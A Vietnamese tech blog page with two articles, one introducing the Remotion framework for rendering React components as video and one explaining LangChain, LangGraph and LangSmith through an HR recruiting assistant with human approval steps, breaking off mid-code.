Remotion – Khi React trở thành công cụ tạo video

P.V.H — Thu, 02 Jul 2026 11:01:02 GMT
Khi nhắc đến việc chỉnh sửa video, hầu hết chúng ta đều nghĩ đến những phần mềm như Premiere Pro, After Effects, DaVinci Resolve hay CapCut. Các công cụ này đều hoạt động theo mô hình quen thuộc: kéo thả, chỉnh sửa trên timeline và xuất video.
Tuy nhiên, trong vài năm gần đây, một xu hướng hoàn toàn mới đang dần trở nên phổ biến trong cộng đồng lập trình viên: viết video bằng code.
Thay vì thao tác bằng chuột, bạn mô tả toàn bộ video bằng React Component, sau đó để chương trình tự động render thành video hoàn chỉnh.
Framework nổi bật nhất cho cách tiếp cận này chính là Remotion.
Remotion là gì?

Remotion là một framework mã nguồn mở cho phép xây dựng video bằng React, TypeScript, HTML và CSS.
Thay vì sử dụng timeline như các phần mềm chỉnh sửa truyền thống, Remotion coi mỗi video là một ứng dụng React.
Bạn có thể sử dụng toàn bộ kiến thức quen thuộc của Web Development:
React Component
Props
State
Tailwind CSS
SVG
Canvas
Animation
npm packages
để xây dựng video.
Sau khi hoàn thành, Remotion sẽ render thành:
MP4
GIF
PNG Sequence
WebM
với chất lượng rất cao.
Khác biệt lớn nhất: Video cũng chỉ là React Component

Nếu đã từng viết React, đoạn code sau sẽ rất quen thuộc.
export const MyVideo = () => {
  return (
    
      
      
      <Subtitle />
      <Avatar />
    </AbsoluteFill>
  );
};
</code></pre><p>Không có khái niệm timeline hay layer như Premiere.</p><p>Mỗi thành phần của video chỉ đơn giản là một React Component.</p><p>Ví dụ:</p><ul><li>Logo</li><li>Tiêu đề</li><li>Hình nền</li><li>Biểu đồ</li><li>Subtitles</li><li>Avatar</li></ul><p>đều có thể tái sử dụng giống hệt component trong một ứng dụng web.</p><p>Điều này mở ra khả năng xây dựng các thư viện component dành riêng cho video, tương tự như cách chúng ta xây dựng Design System cho giao diện web.</p><hr><h1 id="remotion-render-video-nh-th-n-o">Remotion render video như thế nào?</h1><p>Đây là phần thú vị nhất của Remotion.</p><p>Thực tế, video chỉ là một chuỗi hình ảnh được phát liên tục.</p><p>Ví dụ:</p><ul><li>30 FPS nghĩa là mỗi giây có 30 hình</li><li>60 FPS nghĩa là mỗi giây có 60 hình</li></ul><p>Một video dài 10 giây ở 30 FPS sẽ gồm:</p><pre><code>30 × 10 = 300 frame
</code></pre><p>Remotion không làm việc theo "thời gian", mà làm việc theo <strong>frame</strong>.</p><p>Trong mỗi lần render, Remotion sẽ biết chính xác mình đang ở frame thứ bao nhiêu.</p><pre><code class="language-tsx">const frame = useCurrentFrame();
</code></pre><p>Giá trị có thể là:</p><pre><code>0
1
2
...
299
</code></pre><p>Sau đó React sẽ render lại component dựa trên giá trị frame hiện tại.</p><p>Có thể hình dung đơn giản:</p><pre><code>React(frame = 0)
↓

Frame 0

React(frame = 1)
↓

Frame 1

React(frame = 2)
↓

Frame 2
</code></pre><p>Sau khi render xong tất cả các frame, Remotion sẽ ghép chúng lại thành video.</p><hr><h1 id="m-i-animation-u-c-t-nh-to-n-t-frame">Mọi animation đều được tính toán từ frame</h1><p>Giả sử bạn muốn một đoạn text chạy từ bên phải sang bên trái trong 2 giây.</p><p>Nếu video chạy ở 30 FPS thì:</p><pre><code>2 giây = 60 frame
</code></pre><p>Remotion cung cấp hàm <code>interpolate</code>.</p><pre><code class="language-tsx">const frame = useCurrentFrame();

const x = interpolate(
    frame,
    [0, 60],
    [800, 0]
);
</code></pre><p>Điều này có nghĩa:</p><!--kg-card-begin: html--><table>
<thead>
<tr>
<th>Frame</th>
<th>Vị trí</th>
</tr>
</thead>
<tbody>
<tr>
<td>0</td>
<td>800 px</td>
</tr>
<tr>
<td>30</td>
<td>400 px</td>
</tr>
<tr>
<td>60</td>
<td>0 px</td>
</tr>
</tbody>
</table><!--kg-card-end: html--><p>Bạn không cần tự tính toán từng frame.</p><p>Remotion sẽ tự nội suy (interpolation) để tạo chuyển động mượt mà.</p><p>Chính vì mọi animation đều được tính từ frame nên việc tạo:</p><ul><li>Fade In</li><li>Fade Out</li><li>Zoom</li><li>Rotate</li><li>Scale</li><li>Motion Graphics</li></ul><p>đều rất trực quan.</p><hr><h1 id="sequence-timeline-b-ng-code">Sequence – Timeline bằng code</h1><p>Trong Premiere, bạn kéo các clip vào timeline.</p><p>Trong Remotion, timeline được mô tả bằng React.</p><pre><code class="language-tsx"><Sequence from={0}>
    <Intro />
</Sequence>

<Sequence from={90}>
    <Content />
</Sequence>

<Sequence from={300}>
    <Ending />
</Sequence>
</code></pre><p>Đoạn code trên có nghĩa:</p><ul><li>Intro bắt đầu từ frame 0</li><li>Content bắt đầu từ frame 90</li><li>Ending bắt đầu từ frame 300</li></ul><p>Toàn bộ timeline được quản lý bằng code.</p><p>Điều này mang lại lợi thế rất lớn:</p><ul><li>Có thể dùng vòng lặp để sinh nhiều scene.</li><li>Có thể hiển thị scene dựa trên dữ liệu từ API.</li><li>Có thể tạo video với độ dài khác nhau chỉ bằng cách thay đổi dữ liệu đầu vào.</li></ul><hr><h1 id="render-video-ph-a-sau-di-n-ra-nh-th-n-o">Render video phía sau diễn ra như thế nào?</h1><p>Khác với suy nghĩ của nhiều người, Remotion không quay màn hình trình duyệt.</p><p>Quá trình render diễn ra như sau:</p><pre><code>React Components
        │
        ▼
Headless Chrome
        │
        ▼
Render từng Frame
        │
        ▼
PNG Images
        │
        ▼
FFmpeg
        │
        ▼
MP4
</code></pre><p>Nói cách khác:</p><ol><li>Remotion mở một trình duyệt Chrome chạy ngầm.</li><li>Render từng frame giống như render một trang web.</li><li>Xuất từng frame thành ảnh PNG.</li><li>Dùng FFmpeg ghép toàn bộ ảnh thành video MP4.</li></ol><p>Nhờ vậy Remotion có thể render:</p><ul><li>Full HD</li><li>2K</li><li>4K</li><li>60 FPS</li></ul><p>một cách ổn định.</p><hr><h1 id="v-sao-react-l-i-ph-h-p-t-o-video">Vì sao React lại phù hợp để tạo video?</h1><p>Thoạt nhìn, React là thư viện để xây dựng giao diện.</p><p>Nhưng nếu để ý kỹ, một video thực chất cũng là tập hợp của nhiều thành phần giao diện:</p><ul><li>Text</li><li>Hình ảnh</li><li>Icon</li><li>Chart</li><li>Avatar</li><li>Waveform</li><li>Subtitle</li></ul><p>Mỗi thành phần đều có:</p><ul><li>Vị trí</li><li>Kích thước</li><li>Animation</li><li>Thời gian xuất hiện</li></ul><p>Đó cũng chính là những gì React làm rất tốt.</p><p>Việc tận dụng hệ sinh thái React giúp lập trình viên có thể tái sử dụng rất nhiều thư viện hiện có như:</p><ul><li>Tailwind CSS</li><li>Framer Motion</li><li>D3.js</li><li>Chart.js</li><li>Three.js</li><li>SVG Animation</li></ul><p>để tạo ra những video có giao diện hiện đại mà không cần học thêm một công cụ chỉnh sửa mới.</p><hr><h1 id="k-nguy-n-ai-agent-t-vi-t-code-sang-t-o-video-b-ng-prompt">Kỷ nguyên AI Agent: Từ viết code sang tạo video bằng prompt</h1><p>Ban đầu, Remotion hướng đến lập trình viên.</p><p>Muốn tạo video, bạn phải tự viết toàn bộ React Component.</p><p>Ngày nay, với sự phát triển của các AI Agent, vai trò của lập trình viên đang dần thay đổi.</p><p>Thay vì viết từng dòng code, bạn chỉ cần đưa ra yêu cầu:</p><blockquote>"Hãy tạo video giới thiệu sản phẩm dài 1 phút với giọng đọc nữ, phụ đề và hình minh họa."</blockquote><p>AI sẽ tự động:</p><ul><li>Viết kịch bản.</li><li>Chia scene.</li><li>Sinh mã React cho Remotion.</li><li>Tạo giọng đọc bằng ElevenLabs hoặc OpenAI TTS.</li><li>Tìm hoặc sinh hình ảnh.</li><li>Ghép tất cả thành video hoàn chỉnh.</li></ul><p>Remotion đóng vai trò như <strong>engine render video</strong>, còn AI chịu trách nhiệm xây dựng nội dung và cấu trúc video.</p><hr><h1 id="m-t-pipeline-t-o-video-b-ng-ai">Một pipeline tạo video bằng AI</h1><p>Một workflow phổ biến hiện nay có thể được mô tả như sau:</p><pre><code>Prompt của người dùng
          │
          ▼
OpenAI / Gemini / Claude
          │
          ▼
Kịch bản + JSON mô tả các scene
          │
          ▼
ElevenLabs hoặc OpenAI TTS
          │
          ▼
File giọng đọc
          │
          ▼
Remotion
          │
          ▼
Render MP4
</code></pre><p>Thay vì chỉnh sửa thủ công từng video, toàn bộ quy trình có thể được tự động hóa, giúp tạo ra hàng trăm hoặc hàng nghìn video chỉ từ dữ liệu đầu vào.</p><hr><h1 id="khi-n-o-n-n-s-d-ng-remotion">Khi nào nên sử dụng Remotion?</h1><p>Remotion đặc biệt phù hợp với các bài toán cần tạo video hàng loạt hoặc tạo video từ dữ liệu:</p><ul><li>Video AI tự động.</li><li>Video tin tức.</li><li>Video TikTok hoặc YouTube Shorts.</li><li>Video quảng cáo được cá nhân hóa.</li><li>Video báo cáo dữ liệu.</li><li>Video đào tạo nội bộ.</li><li>Video giới thiệu sản phẩm.</li><li>Video tạo từ nội dung CMS.</li></ul><p>Ngược lại, nếu mục tiêu là dựng phim, MV hoặc các dự án cần chỉnh sửa thủ công với nhiều hiệu ứng điện ảnh, các phần mềm như Premiere Pro hay DaVinci Resolve vẫn là lựa chọn phù hợp hơn.</p><hr><h1 id="k-t-lu-n">Kết luận</h1><p>Remotion không chỉ là một thư viện tạo video bằng React, mà còn đại diện cho một cách tư duy mới: <strong>coi video là một sản phẩm phần mềm có thể lập trình, tái sử dụng và tự động hóa</strong>.</p><p>Khi kết hợp với AI Agent và các mô hình ngôn ngữ lớn (LLM), Remotion trở thành nền tảng mạnh mẽ để xây dựng các hệ thống tạo video tự động, từ video marketing, video đào tạo đến các nội dung cá nhân hóa ở quy mô lớn.</p><p>Đối với lập trình viên, việc học Remotion không chỉ giúp mở rộng kỹ năng sang lĩnh vực xử lý đa phương tiện, mà còn mở ra cơ hội xây dựng các ứng dụng AI Video Generation – một xu hướng đang phát triển rất nhanh trong những năm gần đây.</p><hr><h1 id="tham-kh-o">Tham khảo</h1><ul><li><a href="https://www.remotion.dev/">https://www.remotion.dev/</a></li><li><a href="https://github.com/remotion-dev/remotion">https://github.com/remotion-dev/remotion</a></li><li><a href="https://www.remotion.dev/showcase">https://www.remotion.dev/showcase</a></li></ul>
</article>
<article>
<h1>LangChain, LangGraph, LangSmith: Hiểu qua ví dụ build AI tool hỗ trợ HR</h1>
<p>D.T.H.L — Mon, 29 Jun 2026 10:42:16 GMT</p>
<!--kg-card-begin: markdown--><h3 id="langchainlanggraphlangsmithhiuquavdbuildaitoolhtrhr">LangChain, LangGraph, LangSmith: Hiểu qua ví dụ build AI tool hỗ trợ HR</h3>
<blockquote>
<p>Bài viết này giải thích <strong>LangChain</strong>, <strong>LangGraph</strong> và <strong>LangSmith</strong> theo cách gần gũi, dễ hình dung, nhưng vẫn đủ sâu cho developer muốn build AI agent thật. Ví dụ xuyên suốt là một tool tên <strong>HR Copilot</strong> — trợ lý AI giúp team HR tìm ứng viên, chấm điểm CV, soạn email và theo dõi quy trình tuyển dụng.</p>
</blockquote>
<hr>
<h4 id="muvsaochgillmlcha">Mở đầu: Vì sao chỉ gọi LLM là chưa đủ?</h4>
<p>Giả sử bạn muốn build một tool AI cho team HR.</p>
<p>HR nhập vào một câu rất tự nhiên:</p>
<pre><code class="language-text">Tìm giúp tôi ứng viên phù hợp cho vị trí Senior Backend Go Developer,
ưu tiên AWS, MySQL và tiếng Nhật N2. Nếu phù hợp thì soạn email mời phỏng vấn.
</code></pre>
<p>Nghe qua thì giống một câu hỏi bình thường có thể copy vào ChatGPT. Nhưng nếu muốn biến nó thành <strong>một sản phẩm thật</strong>, tool phải làm nhiều hơn rất nhiều:</p>
<ul>
<li>hiểu HR đang muốn tuyển vị trí nào,</li>
<li>lấy đúng JD liên quan,</li>
<li>tìm CV trong database hoặc kho hồ sơ,</li>
<li>đọc và chấm điểm từng ứng viên,</li>
<li>giải thích vì sao ứng viên này phù hợp,</li>
<li>soạn email mời phỏng vấn,</li>
<li>dừng lại để HR duyệt trước khi gửi,</li>
<li>cập nhật trạng thái ứng viên trong pipeline,</li>
<li>và ghi lại toàn bộ quá trình để debug nếu AI trả lời sai.</li>
</ul>
<p>Nói cách khác, đây không còn là chuyện “gọi một model và lấy câu trả lời”. Đây là một <strong>AI workflow</strong> có nhiều bước, có dữ liệu thật, có tool thật, có quyền hạn, có phê duyệt của con người và có nhu cầu theo dõi chất lượng.</p>
<p>Đó là lúc bộ ba <strong>LangChain — LangGraph — LangSmith</strong> trở nên hữu ích.</p>
<hr>
<h4 id="1bacngcnykhcnhauthno">1. Ba công cụ này khác nhau thế nào?</h4>
<p>Hãy tưởng tượng ta đang xây một “nhà máy nhỏ” để hỗ trợ HR tuyển dụng.</p>
<ul>
<li><strong>LangChain</strong> giống các bộ phận máy: máy đọc CV, máy gọi LLM, máy tìm dữ liệu, máy trả JSON.</li>
<li><strong>LangGraph</strong> giống dây chuyền vận hành: bước nào chạy trước, khi nào rẽ nhánh, khi nào dừng chờ HR duyệt.</li>
<li><strong>LangSmith</strong> giống phòng điều khiển: xem agent đã chạy qua bước nào, sai ở đâu, tốn bao nhiêu tiền, chậm ở đoạn nào.</li>
</ul>
<p>Nói ngắn gọn:</p>
<pre><code class="language-text">LangChain  = AI biết dùng công cụ.
LangGraph  = AI làm việc theo quy trình.
LangSmith  = team nhìn thấy AI đã làm gì và sai ở đâu.
</code></pre>
<p>Hoặc theo góc nhìn kỹ thuật:</p>
<table>
<thead>
<tr>
<th>Công cụ</th>
<th>Vai trò chính</th>
<th>Ví dụ trong HR Copilot</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>LangChain</strong></td>
<td>Ghép LLM với prompt, tool, retriever, output parser</td>
<td>Chấm điểm CV theo JD và trả JSON</td>
</tr>
<tr>
<td><strong>LangGraph</strong></td>
<td>Điều phối workflow có state, nhánh, vòng lặp, human approval</td>
<td>Tìm CV → chấm điểm → soạn email → chờ HR duyệt → gửi</td>
</tr>
<tr>
<td><strong>LangSmith</strong></td>
<td>Trace, debug, evaluation, monitoring</td>
<td>Xem vì sao AI chọn ứng viên A thay vì B</td>
</tr>
</tbody>
</table>
<p>Một cách nhớ khác:</p>
<pre><code class="language-text">LangChain  = khả năng
LangGraph  = quy trình
LangSmith  = niềm tin
</code></pre>
<hr>
<h4 id="2trckhiisuaiagentlg">2. Trước khi đi sâu: AI agent là gì?</h4>
<p>Một chatbot bình thường thường chạy như sau:</p>
<pre><code class="language-text">User hỏi → LLM trả lời
</code></pre>
<p>Một AI agent thì khác. Agent không chỉ trả lời, mà có thể <strong>tự quyết định bước tiếp theo</strong> và <strong>gọi công cụ bên ngoài</strong>.</p>
<p>Ví dụ với HR Copilot:</p>
<pre><code class="language-text">HR yêu cầu tìm ứng viên
→ Agent hiểu yêu cầu
→ Agent gọi tool lấy JD
→ Agent gọi tool tìm CV
→ Agent đọc CV
→ Agent chấm điểm
→ Agent soạn email
→ Agent dừng lại chờ HR duyệt
</code></pre>
<p>Một agent thường có ba phần:</p>
<table>
<thead>
<tr>
<th>Thành phần</th>
<th>Hiểu đơn giản</th>
<th>Ví dụ HR</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Não</strong></td>
<td>LLM suy luận và quyết định</td>
<td>“Ứng viên này thiếu AWS, nên điểm thấp hơn”</td>
</tr>
<tr>
<td><strong>Giác quan</strong></td>
<td>Đọc dữ liệu, tìm tài liệu, truy xuất thông tin</td>
<td>Search JD, đọc CV, lấy note ứng viên</td>
</tr>
<tr>
<td><strong>Tay chân</strong></td>
<td>Gọi tool/API để hành động</td>
<td>Gửi email, cập nhật ATS, post Slack</td>
</tr>
</tbody>
</table>
<p>Nhiều agent hiện đại chịu ảnh hưởng từ ý tưởng <strong>ReAct</strong>:</p>
<pre><code class="language-text">Suy nghĩ → Hành động → Quan sát kết quả → Suy nghĩ lại → ... → Trả lời
</code></pre>
<p>Trong ví dụ HR:</p>
<pre><code class="language-text">Suy nghĩ: Cần tìm ứng viên Backend Go.
Hành động: gọi search_candidates().
Quan sát: tìm được 10 CV.
Suy nghĩ lại: cần chấm điểm theo AWS, MySQL, tiếng Nhật.
Hành động tiếp: gọi score_candidate().
</code></pre>
<p>Với task đơn giản, vòng lặp này có thể viết bằng code thường. Nhưng khi workflow có nhiều bước, rẽ nhánh, dừng chờ người duyệt, resume sau vài giờ hoặc vài ngày, tự viết bằng <code>while</code> sẽ rất nhanh rối. Đây là lý do LangGraph tồn tại.</p>
<hr>
<h3 id="phnihiubacngcquabitonhr">PHẦN I — HIỂU BA CÔNG CỤ QUA BÀI TOÁN HR</h3>
<hr>
<h4 id="3langchainbnghnillmvithgiibnngoi">3. LangChain: bộ đồ nghề để nối LLM với thế giới bên ngoài</h4>
<p>Nếu chỉ cần làm một việc rất đơn giản, bạn chưa chắc cần LangChain.</p>
<p>Ví dụ:</p>
<pre><code class="language-text">Tóm tắt CV này trong 5 dòng.
</code></pre>
<p>Trường hợp đó, gọi thẳng OpenAI / Anthropic / Gemini API cũng được.</p>
<p>Nhưng HR Copilot không đơn giản như vậy. Nó cần nhiều mảnh ghép:</p>
<ul>
<li>prompt để hướng dẫn model,</li>
<li>model để suy luận,</li>
<li>tool để gọi database ứng viên,</li>
<li>retriever để tìm CV hoặc policy liên quan,</li>
<li>output parser để trả kết quả dạng JSON,</li>
<li>streaming, retry, fallback, batch nếu chạy ở production.</li>
</ul>
<p>LangChain giúp chuẩn hóa các mảnh ghép đó để ta nối chúng thành một pipeline.</p>
<pre><code class="language-text">JD + CV
→ Prompt đánh giá
→ LLM
→ Structured Output
→ Backend lưu kết quả
</code></pre>
<h5 id="31langchaingiiquytpaing">3.1 LangChain giải quyết pain gì?</h5>
<p>Khi mới thử AI, ta thường viết kiểu:</p>
<pre><code class="language-python">response = client.chat.completions.create(...)
</code></pre>
<p>Cách này ổn cho demo nhỏ. Nhưng khi app lớn dần, bạn sẽ gặp nhiều câu hỏi:</p>
<ul>
<li>Nếu muốn đổi model từ GPT sang Claude thì sao?</li>
<li>Prompt có nhiều biến thì quản lý thế nào?</li>
<li>Làm sao bắt LLM trả JSON đúng schema?</li>
<li>Làm sao cho LLM gọi tool như <code>search_candidates()</code>?</li>
<li>Làm sao ghép RAG vào để trả lời dựa trên dữ liệu thật?</li>
<li>Làm sao stream kết quả, retry khi lỗi, fallback khi model fail?</li>
</ul>
<p>LangChain không làm thay toàn bộ sản phẩm cho bạn. Nó cho bạn <strong>bộ linh kiện chuẩn hóa</strong> để build nhanh và gọn hơn.</p>
<h5 id="32ccmnhghpquantrngtronglangchain">3.2 Các mảnh ghép quan trọng trong LangChain</h5>
<h6 id="model">Model</h6>
<p>Model là LLM bạn dùng: GPT, Claude, Gemini, Llama local...</p>
<pre><code class="language-python">from langchain_anthropic import ChatAnthropic

llm = ChatAnthropic(model="claude-opus-4-8")
result = llm.invoke("Tóm tắt CV này trong 5 bullet points")
</code></pre>
<p>Điểm hay là khi đổi provider, phần còn lại của pipeline ít bị ảnh hưởng hơn so với gọi API thủ công ở nhiều nơi.</p>
<h6 id="prompttemplate">Prompt Template</h6>
<p>Prompt template giúp bạn viết prompt có biến, dễ tái sử dụng và dễ test.</p>
<pre><code class="language-python">from langchain_core.prompts import ChatPromptTemplate

prompt = ChatPromptTemplate.from_messages([
    ("system", "Bạn là HR specialist có kinh nghiệm tuyển dụng IT."),
    ("user", "Đánh giá CV sau so với JD.\n\nCV:\n{cv}\n\nJD:\n{jd}")
])
</code></pre>
<p>Thay vì nối chuỗi thủ công ở nhiều chỗ, bạn có một template rõ ràng.</p>
<h6 id="structuredoutput">Structured Output</h6>
<p>Với app thật, text tự do rất khó xử lý.</p>
<p>Ví dụ output tự do:</p>
<pre><code class="language-text">Ứng viên này khá phù hợp, có thể mời phỏng vấn.
</code></pre>
<p>Backend sẽ khó biết điểm là bao nhiêu, decision là gì, thiếu skill nào.</p>
<p>Output tốt hơn:</p>
<pre><code class="language-json">{
  "match_score": 82,
  "decision": "interview",
  "strengths": ["Go", "AWS", "MySQL"],
  "risks": ["Chưa rõ kinh nghiệm leadership"]
}
</code></pre>
<p>Structured output giúp AI trả về dữ liệu có hình dạng rõ ràng để backend dùng tiếp.</p>
<h6 id="tool">Tool</h6>
<p>Tool là function/API mà agent có thể gọi.</p>
<p>Ví dụ:</p>
<pre><code class="language-text">search_candidates(skills=["Go", "AWS"], language="N2")
get_candidate_cv(candidate_id="C001")
send_email(to, subject, body)
update_pipeline_status(candidate_id, status)
</code></pre>
<p>LLM không tự biết database nội bộ của công ty. Tool chính là cầu nối để LLM chạm vào dữ liệu thật.</p>
<h6 id="retrieverrag">Retriever / RAG</h6>
<p>RAG là pattern:</p>
<pre><code class="language-text">Câu hỏi
→ Tìm tài liệu liên quan
→ Đưa tài liệu vào prompt
→ LLM trả lời dựa trên tài liệu đó
</code></pre>
<p>Trong HR Copilot, RAG có thể dùng để tìm:</p>
<ul>
<li>JD liên quan,</li>
<li>CV cũ,</li>
<li>policy tuyển dụng,</li>
<li>salary band,</li>
<li>interview guideline,</li>
<li>note lịch sử ứng viên.</li>
</ul>
<h6 id="chain">Chain</h6>
<p>Chain là pipeline tuyến tính.</p>
<pre><code class="language-python">chain = prompt | llm | output_parser
result = chain.invoke({"cv": cv_text, "jd": jd_text})
</code></pre>
<p>Tư duy rất đơn giản:</p>
<pre><code class="language-text">Input → Prompt → Model → Parser → Output
</code></pre>
<p>Chain rất hợp với tác vụ một đường thẳng: tóm tắt, phân loại, trích xuất thông tin, chấm điểm theo schema.</p>
<h5 id="33vdlangchaintronghrcopilot">3.3 Ví dụ LangChain trong HR Copilot</h5>
<p>Ví dụ chấm điểm CV theo JD:</p>
<pre><code class="language-python">from langchain_anthropic import ChatAnthropic
from langchain_core.prompts import ChatPromptTemplate
from pydantic import BaseModel, Field

class CandidateScore(BaseModel):
    candidate_name: str
    match_score: int = Field(ge=0, le=100)
    level: str
    strengths: list[str]
    risks: list[str]
    recommendation: str  # "move_to_interview" | "hold" | "reject"

prompt = ChatPromptTemplate.from_messages([
    ("system", "Bạn là HR specialist tuyển dụng IT. Trả kết quả theo schema."),
    ("user", "Đánh giá CV sau so với JD.\n\nCV:\n{cv}\n\nJD:\n{jd}")
])

llm = ChatAnthropic(model="claude-opus-4-8").with_structured_output(CandidateScore)
chain = prompt | llm

result = chain.invoke({"cv": cv_text, "jd": jd_text})
</code></pre>
<p>Output mong muốn:</p>
<pre><code class="language-json">{
  "candidate_name": "Nguyen Van A",
  "match_score": 82,
  "level": "middle",
  "strengths": ["Go backend", "AWS", "MySQL"],
  "risks": ["Chưa thấy kinh nghiệm leadership rõ ràng"],
  "recommendation": "move_to_interview"
}
</code></pre>
<p></p>
<h5 id="34khinochcnlangchain">3.4 Khi nào chỉ cần LangChain?</h5>
<p>LangChain là đủ nếu workflow còn đơn giản:</p>
<table>
<thead>
<tr>
<th>Bài toán</th>
<th>Có cần LangGraph không?</th>
</tr>
</thead>
<tbody>
<tr>
<td>Upload CV → tóm tắt JSON</td>
<td>Chưa cần</td>
</tr>
<tr>
<td>CV + JD → score</td>
<td>Chưa cần</td>
</tr>
<tr>
<td>Hỏi đáp policy tuyển dụng bằng RAG</td>
<td>Chưa cần</td>
</tr>
<tr>
<td>Soạn email draft từ template</td>
<td>Chưa cần</td>
</tr>
</tbody>
</table>
<p>Nhưng khi có nhiều bước, rẽ nhánh, phê duyệt, retry, resume, LangChain một mình bắt đầu chưa đủ. Lúc đó ta cần LangGraph.</p>
<hr>
<h4 id="4langgraphkhiagentkhngthchytheomtngthng">4. LangGraph: khi agent không thể chạy theo một đường thẳng</h4>
<p>LangChain rất hợp để ghép pipeline. Nhưng tuyển dụng không phải lúc nào cũng đi theo một đường thẳng.</p>
<p>Ví dụ workflow thật có thể là:</p>
<pre><code class="language-text">Tìm CV
→ Nếu không có ứng viên phù hợp: hỏi lại HR có muốn nới tiêu chí không
→ Nếu có ứng viên tốt: soạn email
→ Trước khi gửi: chờ HR duyệt
→ Nếu HR yêu cầu sửa email: quay lại bước soạn
→ Nếu HR duyệt: gửi email và cập nhật trạng thái
</code></pre>
<p>Đây là workflow có:</p>
<ul>
<li>nhiều bước,</li>
<li>nhiều nhánh,</li>
<li>trạng thái cần giữ lại,</li>
<li>vòng lặp,</li>
<li>bước chờ con người,</li>
<li>khả năng dừng rồi chạy tiếp.</li>
</ul>
<p>LangGraph giúp ta mô hình hóa workflow đó thành một graph.</p>
<pre><code class="language-text">LangGraph biến agent từ “một đoạn prompt thông minh”
thành “một quy trình có kiểm soát”.
</code></pre>
<h5 id="41cckhinimchnhtronglanggraph">4.1 Các khái niệm chính trong LangGraph</h5>
<table>
<thead>
<tr>
<th>Khái niệm</th>
<th>Hiểu đơn giản</th>
<th>Ví dụ HR</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>State</strong></td>
<td>Dữ liệu dùng chung của workflow</td>
<td>JD, danh sách CV, score, email draft</td>
</tr>
<tr>
<td><strong>Node</strong></td>
<td>Một bước xử lý</td>
<td><code>search_candidates</code>, <code>score_candidates</code></td>
</tr>
<tr>
<td><strong>Edge</strong></td>
<td>Đường nối giữa các bước</td>
<td><code>search</code> → <code>score</code></td>
</tr>
<tr>
<td><strong>Conditional Edge</strong></td>
<td>Rẽ nhánh theo điều kiện</td>
<td>score cao → soạn email, không có CV → hỏi lại HR</td>
</tr>
<tr>
<td><strong>Checkpoint</strong></td>
<td>Lưu trạng thái để resume</td>
<td>Dừng chờ HR duyệt email</td>
</tr>
<tr>
<td><strong>Interrupt</strong></td>
<td>Dừng workflow để con người can thiệp</td>
<td>HR bấm Approve / Revise / Reject</td>
</tr>
<tr>
<td><strong>Subgraph</strong></td>
<td>Graph nhỏ trong graph lớn</td>
<td>Subgraph riêng cho “email approval”</td>
</tr>
</tbody>
</table>
<h5 id="42statebnhlmviccaworkflow">4.2 State: bộ nhớ làm việc của workflow</h5>
<p>State là nơi LangGraph giữ dữ liệu trong suốt quá trình chạy.</p>
<p>Ví dụ:</p>
<pre><code class="language-python">from typing import TypedDict, List, Optional

class HRCopilotState(TypedDict):
    user_request: str
    job_id: Optional[str]
    job_description: Optional[dict]
    candidates: List[dict]
    scored_candidates: List[dict]
    top_candidates: List[dict]
    email_draft: Optional[dict]
    hr_approval_status: Optional[str]
    final_result: Optional[str]
</code></pre>
<p>Nếu không có state, mỗi bước sẽ khó biết bước trước đã làm gì. Agent dễ bị mất ngữ cảnh hoặc phải truyền dữ liệu thủ công rất rối.</p>
<h5 id="43nodemibclmtfunctionrrng">4.3 Node: mỗi bước là một function rõ ràng</h5>
<p>Một node có thể là:</p>
<ul>
<li>một function Python bình thường,</li>
<li>một lần gọi LLM,</li>
<li>một lần gọi tool,</li>
<li>hoặc một agent nhỏ hơn.</li>
</ul>
<p>Ví dụ:</p>
<pre><code class="language-text">load_job_description
search_candidates
score_candidates
rank_candidates
generate_email_draft
wait_hr_approval
send_email
update_pipeline_status
</code></pre>
<p>Điểm tốt là workflow trở nên rất dễ đọc. Nhìn graph là biết agent đang được phép đi qua những bước nào.</p>
<h5 id="44conditionaledgechworkflowrnhnh">4.4 Conditional edge: chỗ workflow rẽ nhánh</h5>
<p>Trong HR Copilot, sau khi chấm điểm xong, ta có thể rẽ nhánh:</p>
<pre><code class="language-text">Nếu có ứng viên đạt ngưỡng → soạn email
Nếu không có ai đạt → trả report / hỏi lại HR
</code></pre>
<p>Sau khi HR duyệt email:</p>
<pre><code class="language-text">approved → gửi email
revise   → soạn lại
rejected → dừng
</code></pre>
<p>Đây là lý do LangGraph mạnh hơn chain tuyến tính.</p>
<h5 id="45humanintheloopaixutconngiquytnh">4.5 Human-in-the-loop: AI đề xuất, con người quyết định</h5>
<p>Với tuyển dụng, không nên để AI tự gửi email hoặc tự reject ứng viên mà không có người duyệt.</p>
<p>Cách an toàn hơn:</p>
<pre><code class="language-text">AI tìm ứng viên
→ AI soạn email
→ HR duyệt
→ hệ thống mới gửi
</code></pre>
<p>Trong LangGraph, bước này có thể dùng <code>interrupt()</code> để dừng workflow.</p>
<pre><code class="language-python">from langgraph.types import interrupt

def wait_hr_approval(state: HRCopilotState):
    decision = interrupt({"email_draft": state["email_draft"]})
    return {"hr_approval_status": decision}
</code></pre>
<p>Workflow có thể dừng tại đây, chờ HR bấm Approve / Revise / Reject, rồi resume từ đúng chỗ đó.</p>
<h5 id="46checkpointdngrichytip">4.6 Checkpoint: dừng rồi chạy tiếp</h5>
<p>Nếu HR chưa duyệt email ngay thì sao?</p>
<p>Không vấn đề. LangGraph có checkpointer để lưu state. Agent có thể dừng hôm nay và tiếp tục ngày mai.</p>
<p>Ví dụ:</p>
<pre><code class="language-text">Ngày 1: AI tìm ứng viên, soạn email, dừng chờ HR duyệt.
Ngày 2: HR bấm Approve, workflow resume, gửi email, cập nhật pipeline.
</code></pre>
<p>Đây là điểm rất quan trọng khi build agent cho nghiệp vụ thật.</p>
<h5 id="47vdworkflowlanggraphchohrcopilot">4.7 Ví dụ workflow LangGraph cho HR Copilot</h5>
<pre><code class="language-text">START
  → parse_hr_request
  → load_job_description
  → search_candidates
  → filter_candidates
  → score_candidates
  → rank_candidates
  → select_top_candidates
  → generate_recommendation_report
  → need_email?
       ├── no  → END
       └── yes → generate_email_draft
                 → wait_hr_approval
                      ├── approved → send_email → update_pipeline_status → END
                      ├── revise   → revise_email → wait_hr_approval
                      └── rejected → END
</code></pre>
<p>Code rút gọn:</p>
<pre><code class="language-python">from langgraph.graph import StateGraph, START, END
from langgraph.checkpoint.memory import MemorySaver
from langgraph.types import interrupt

builder = StateGraph(HRCopilotState)

builder.add_node("load_jd", load_jd_fn)
builder.add_node("search", search_candidates_fn)
builder.add_node("score", score_candidates_fn)
builder.add_node("rank", rank_candidates_fn)
